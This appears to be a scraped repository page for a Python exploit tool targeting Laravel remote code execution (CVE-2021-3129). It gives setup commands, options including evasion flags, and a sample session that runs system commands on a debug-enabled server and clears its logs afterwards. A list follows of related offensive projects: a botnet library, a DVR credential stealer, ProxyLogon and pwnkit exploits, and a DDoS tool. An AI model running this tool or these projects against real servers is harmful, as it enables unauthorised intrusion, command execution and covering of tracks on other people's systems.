Laravel RCE (CVE-2021-3129)

Related tags

Security related resourcesCVE-2021-3129
Overview

CVE-2021-3129 - Laravel RCE

About

The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.
This script allows you to write/execute commands on a website running Laravel <= v8.4.2, that has "APP_DEBUG" set to "true" in its ".env" file.

It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files.

Setup

$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help

Options

usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter

Example

$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
    exit - Exit program.
    help - Shows available commands.
    clear_logs - Clears Laravel logs.
    execute <command> - Execute system command.
    write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:

README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js

[@] Clearing logs...
[√] Cleared logs.

Future:

  • Automatically determine PHPGCC chain if version detected while scanning.

Credits

Owner
Joshua van der Poll
Cyber enthousiast / Developer
Joshua van der Poll
GitHub Repository
pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this

</oNion 181 Jan 02, 2023
Learning to compose soft prompts for compositional zero-shot learning.

Compositional Soft Prompting (CSP) Compositional soft prompting (CSP), a parameter-efficient learning technique to improve the zero-shot compositional

Bats Research 32 Jan 02, 2023
"Video Moment Retrieval from Text Queries via Single Frame Annotation" in SIGIR 2022.

ViGA: Video moment retrieval via Glance Annotation This is the official repository of the paper "Video Moment Retrieval from Text Queries via Single F

Ran Cui 38 Dec 31, 2022
CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain device credentials.

EntySec 118 Dec 24, 2022
Used to build an XSS platform on the command line.

pyXSSPlatform Used to build an XSS platform on the command line. Usage: 1.generate the cert file You can use openssl like this: openssl req -new -x509

70 Jun 21, 2022
python driver for fingerprint machine (ZKTeco biometrics)

fpmachine python driver for fingerprint machine (ZKTeco biometrics) support until now 2 model supported and tested ZMM100_TFT and ZMM220_TFT install p

Samy Sultan 4 Oct 06, 2022
AMC- Automatic Media Access Control [MAC] Address Spoofing Tool

AMC (Automatic Media Access Control [MAC] Address Spoofing tool), helps you to protect your real network hardware identity. Each entered time interval your hardware address was changed automatically.

Dipen Chavan 14 Dec 23, 2022
GitLab CI security tools runner

Common Security Pipeline Описание проекта: Данный проект является вариантом реализации DevSecOps практик, на базе: GitLab DefectDojo OpenSouce tools g

Сити-Мобил 14 Dec 23, 2022
Dlint is a tool for encouraging best coding practices and helping ensure Python code is secure.

Dlint Dlint is a tool for encouraging best coding practices and helping ensure Python code is secure. The most important thing I have done as a progra

Dlint 127 Dec 27, 2022
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

27 Sep 23, 2022
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
Brute smb share - Brute force a SMB share

brute_smb_share I wrote this small PoC after bumping into SMB servers where Hydr

devloop 3 Feb 21, 2022
Python exploit code for CVE-2021-4034 (pwnkit)

Python3 code to exploit CVE-2021-4034 (PWNKIT). This was an exercise in "can I make this work in Python?", and not meant as a robust exploit. It Works

Joe Ammond 92 Dec 29, 2022
威胁情报播报

Threat-Broadcast 威胁情报播报 运行环境 项目介绍 从以下公开的威胁情报来源爬取并整合最新信息: 360:https://cert.360.cn/warning 奇安信:https://ti.qianxin.com/advisory/ 红后:https://redqueen.tj-u

东方有鱼名为咸 148 Nov 09, 2022
🎻 Modularized exploit generation framework

Modularized exploit generation framework for x86_64 binaries Overview This project is still at early stage of development, so you might want to come b

ᴀᴇꜱᴏᴘʜᴏʀ 30 Jan 17, 2022
Gefilte Fish GMail filter creator

Gefilte Fish: GMail filter maker Gefilte Fish automates the creation of GMail filters. Use it like this: from gefilte import GefilteFish,

Ned Batchelder 31 Sep 28, 2022
A secure way of storing your passwords.

StrongBox 🔐 A secure way of storing your passwords. 🔑 Why to use StrongBox? StrongBox makes it possible to have a random generated strong password i

Dylan Tintenfich 5 Dec 25, 2021
Hammer-DDos - Hammer DDos With Python

Hammer-DDos $ apt update $ apt upgrade $ apt install python $ apt install git $

1 Jan 24, 2022
A toolkit for web reconnaissance, it's fast and easy to use.

A toolkit for web reconnaissance, it's fast and easy to use. File Structure httpsuite/ main.py init.py db/ db.py init.py subdomains_db directories_db

whoami security 22 Jul 22, 2022
ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp lulz 117 Nov 28, 2022